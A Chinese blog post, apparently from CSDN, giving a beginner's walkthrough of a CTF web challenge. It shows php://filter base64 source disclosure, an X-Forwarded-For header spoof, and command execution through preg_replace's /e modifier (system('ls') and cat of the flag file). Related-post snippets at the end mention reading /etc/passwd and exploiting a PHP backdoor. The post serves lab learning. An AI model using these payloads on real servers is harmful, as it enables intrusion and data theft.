ctf随笔(2)被后门入侵的系统

最新推荐文章于 2024-05-03 16:22:07 发布
最新推荐文章于 2024-05-03 16:22:07 发布
阅读量1.4k 收藏
点赞数 1
文章标签: ctf小白 preg replace php://filter
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ma_nong_/article/details/101027838
版权

这是一道我觉得是我真正开始接触ctf的一题,涉及到php正则表达式,和php://filter协议
题目描述:破坏者会利用工控云管理系统设备维护中心的后门入侵系统
进入之后如下界面
再次点击云平台设备维护中心之后,会发现url和显示都有改变
在这里插入图片描述网址也从111.198.29.45:52706/index.php变成了111.198.29.45:52706/index.php?page=index

尝试111.198.29.45:52706/index.php?page=index.php网页显示了Ok字样
在这里插入图片描述
这样就可清楚是存在index.php这个页面的,但是我们没有办法获得该网页的信息,用php://filter协议处理一下,我们可以得到index.php的内容,协议的详细信息可参考https://blog.csdn.net/destiny1507/article/details/82347371
构造:php://filter/read=convert.base64-encode/resource=index.php

对url经过处理
在这里插入图片描述就有了一堆看不懂的码,悲伤。。但是用base64解码后我们就能看到一整篇php代码了,代码审计也让人头大,最后其实就只有这一段是有用的
在这里插入图片描述首先呢,这玩意要让你加个X-Forwarded-For头,然后就是一个正则表达式的函数preg replace,在网上搜索了一下,这个函数有一个很严重的bug
在这里插入图片描述接下来就是抓包还有实践尝试的阶段了,首先将X-Forwarded-For头改一下,然后就可以发现网页的回应开始变化:welcome my admin
在这里插入图片描述
然后就对函数里的pat,rep,sub变量进行测试,在url上再添加如下代码:
?pat=/test/e&rep=system(‘ls’)&sub=test
返回如下信息
在这里插入图片描述这个s3chahahaDir文件夹里面应该就是相应的flag了
?pat=/test/e&rep=system(‘ls+s3chahahaDir’)&sub=test
在这里插入图片描述需要注意的是,如果直接在网页上的url修改,那么’‘单引号则不会报错,如果在brup的repeater中的headers中直接写’'单引号是会报错的,这时候要把’写为%27。明显有个flag的文件夹,来让我康康
?pat=/test/e&rep=system(‘ls+s3chahahaDir/flag’)&sub=test
在这里插入图片描述果然有个flag,让我康康你是啥嗷
?pat=/test/e&rep=system(‘cat+s3chahahaDir/flag/flag.php’)&sub=test
在这里插入图片描述成功拿到flag

小崽砸
关注
CTF到渗透测试【浅谈渗透测试之信息收集】
qq_43679507的博客
11-15 1006
CTF到渗透测试【浅谈渗透测试之信息收集】
ctf随笔
weixin_44511709的博客
11-05 787
记某次ctf跟着大佬们学习的经历。 回旋13,回不回?(签到题) 首次接触rot13加密的题目,算是开拓自己的知识点了。 技巧:rot13是一种加密方式,一种简易的替换式密码算法。rot13也是自己的逆反,即要还原成原文只需要使用同一种算发即可,同样的操作可用于加密和解密。 应用ROT13到一段文字上仅仅只需要检查字母顺序并取代它在13位之后的对应字母,有需要超过时则重新绕回26英文字母开头...
CTF-FTP后门利用
不知名白帽的博客
08-19 1597
CTF-FTP后门利用
CTF后门入侵系统(攻防世界)
走在成功路上的博客
09-22 2083
CTF后门入侵系统php://filter的妙用测试题目测试题目二 php://filter的妙用 php://filterphp中特有协议流,"中间流"来处理其他流,就比如可以用:post请求通过base64将php源码编译并输出; localhost:80/index.php?php://filter/write=convert.base64-decode/resource=index...
2024青少年ctf擂台挑战赛round1-php后门
weixin_71656576的博客
03-01 381
该事件是黑客利用具有git权限的账户提交了一个恶意commit,给PHP源码的zlib扩展增加了一个后门。如果该行由PHP驱动的网站运行,则将允许未经授权的访问者执行他们选择的代码。当发现请求特殊的HTTP头部中包含字符串zerodium时,则用eval执行User-Agent第8位字符后内容。利用该后门,攻击者可以执行任意命令,对于任何使用了存在后门PHP的服务器来说都有巨大的风险和威胁。使用蚁剑连接,进入虚拟终端输入 cat /flag 就得到flag了。不知道什么东西,直接开搜。
应急响应-CTF-BUUCTF-后门查杀 1
theenderofroot的博客
04-12 1367
明显的一个文件包含漏洞代码,可以GET传参自定义文件名并且自动拼接php后缀,但是没有flag。2、下载下来是一个网站源码,看来是一道代码审计题,直接把文件夹放入PhpStorm中。5、那么就只能先看include文件夹了,里面还有个include.php,重点审查。4、 uploud文件夹里有个压缩包,打开看发现是一个很正常的word文档。发现$pass变量,内容好像是MD5加密字符串,包上flag试一试。3、先看web.php,这个文件的名字有点可疑。1、快速过一下题目,下载压缩包。
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛中,可利用该工具自动识别编码类型并解码,快速解决misc类别的密码题目。 其他说明: 该工具具备智能判断密码...
CTF工具之seay源代码审计系统(web).rar
09-16
CTF工具之seay源代码审计系统(web)】是一个专门为网络安全竞赛(CTF,Capture The Flag)设计的源代码审计工具,主要用于Web安全领域。这个工具的主要目的是帮助参赛者或者安全研究人员检测和分析Web应用程序中...
2-CTF解题技能之MISC基础 二
10-05
2-CTF解题技能之MISC基础 二
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
ctf图文讲解-FTP后门服务利用
weixin_45441727的博客
03-17 646
首先进行靶机发现 netdiscover -r 靶机IP网段 发现靶机,对靶机进行操作系统版本扫描 nmap -sV 靶机IP 发现21端口版本号为 ProFTPD 1.3.3c 通过searchsploit查看对应版本号漏洞文件 searchsploit ProFTPD 1.3.3c 查看文件 cat /usr/share/exploitdb/exploits/linux/remote/15662.txt 很多情况下我们可以通过这些文件来判断如何去进行攻击,kail大多数都是把攻击方法
防御windows系统激活工具的后门入侵
崔凯洋的博客
08-26 1040
实验环境:win10 64位(虚拟机) 测试人:SAYC 背景:刚装完电脑windows系统,又或者是电脑店的装机师傅来家里安装系统 这个时候使用windows激活工具来激活其实是非常危险的,因为这个时候电脑没有任何的防御措施,双击运行程序可能就会在电脑中的某个地方植入病毒并隐藏,有些激活工具自身也会做免杀 我们来分析一款工具:如下图 我们其实并不清楚这款工具有没有植入后门,所以我选择不打开exe文件,用BBedit打开上图Keys.ini,如下图 很惊奇的发现了几个个英文单词,Pr
shift后门入侵步骤
04-13 733
shift后门入侵 步骤 找到C:\WINDOWS\system32\sethc.exe 文件并将其删除 在工具文件夹选项——查看中红圈中的更改了 将 C:\WINDOWS\system32\dllcache\sethc.exe删除,这个文件夹中放着缓存,如果不删除就会自动变回去 找到 C:\WINDOWS\system32\cmd.exe 将其复制...
XCTF攻防世界web之ics-05(含自动化脚本)
weixin_50464560的博客
02-10 906
一、手解 本文借鉴以下两篇文章的指导 https://www.jianshu.com/p/5a502873635b https://blog.csdn.net/about23/article/details/95349625   全部点击一遍,只有这个可以有其他界面   题目描述是 “其他破坏者会利用工控管理系统设备维护中心的后门入侵系统” 在后面添加login.php 无果,御剑扫描也无结果,源码也找不到其他东西 再次点击上面的“平台设备
攻防世界,Web:ics-05
Pai_Space
05-04 501
其他破坏者会利用工控管理系统设备维护中心的后门入侵系统 只能进入维护中心 要入侵系统,没有多余的信息,扫目录 没东西,那只能在原本页面找 源码中有个超链接 对应的是左上角的文字“平台设备维护中心” 对应的 url,参数泄露 端口不给扫,先看看 ssh 开了没 ?page=php://filter/read=convert.base64-encode/resource=../../../../etc/passwd ssh 开了 用参数读页面源码,最下面..
CTF Web复现』BUUCTF-[CISCN2019 华北赛区 Day1 Web1]Dropbox
Ho1aAs‘s Blog
09-08 943
利用点:任意文件读取;phar反序列化POP链读取文件;绕过MIME文件上传;任意文件删除;phar://协议触发反序列化
2024年网安最新CTF工控工业互联网(ISC)复现总结WP(超详细)_工控ctf
2401_84297944的博客
05-03 1734
工厂车间流水线某工业控制设备遭到不明人员攻击,根据对攻击行为的溯源分析发现攻击者对设备进行了程序上传操作,请根据网络数据流量协助运维人员查找证据找到flag,flag格式为flag{}。我们在SCADA 工程中写入了flag字段,请获取该工程flag,flag形式为 flag{}。工业网络中存在的异常,尝试通过分析PACP流量包,分析出流量数据中的异常点,并拿到FLAG,flag格式为 flag{}。工业网络中存在异常,尝试通过分析PCAP流量包,分析出流量数据中的异常点,并拿到FLAG。
在硬盘留下后门,重装系统都没辙
zdy0_2004的专栏
08-12 1102
在硬盘留下后门,重装系统都没辙 2013/08/12 | 分类: IT技术 | 1 条评论 | 标签: 硬盘, 黑客 分享到: 7 本文由 伯乐在线 - 伯乐在线读者 翻译自 Sprites Mods。转载请参见文章末尾处的要求。 【感谢@心理未成年的某青年这次要给力 的热心翻译。如果其他朋友也有不错的原创或译文,可以尝试推荐给伯乐在线
ctf工具dtmf2num安装
最新发布
06-12
CTF(Capture The Flag)是一种网络安全竞赛活动,其中参与者会使用各种工具来解决安全挑战。DTMF(Dual Tone Multi Frequency)是一种电话拨号系统,而dtmf2num工具则是用于将接收到的DTMF信号转换为数字,这对于某些CTF场景中的音频解码任务可能非常有用。 `dtmf2num`是一个用于处理DTMF音频并将其转换成数字的Python库,你可以通过pip进行安装。以下是安装步骤: 1. **确保你已经安装了Python**:如果你还没有安装Python,可以从官网(https://www.python.org/downloads/)下载并安装最新版本。 2. **打开命令行终端或PowerShell**:在Windows上是CMD或PowerShell,在macOS/Linux上是Terminal。 3. **运行安装命令**: ``` pip install dtmf2num ``` 运行这个命令后,pip会自动从PyPI(Python Package Index)下载并安装dtmf2num库。 4. **验证安装**: 安装完成后,你可以在Python环境中通过导入`dtmf2num`来检查是否安装成功。例如: ```python import dtmf2num ``` 如果没有错误,就说明dtmf2num已安装。 **相关问题:** 1. DTMF是什么类型的音频信号? 2. 在哪些CTF挑战中会用到dtmf2num这类工具? 3. 如何在实际的音频文件上测试dtmf2num的功能?
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值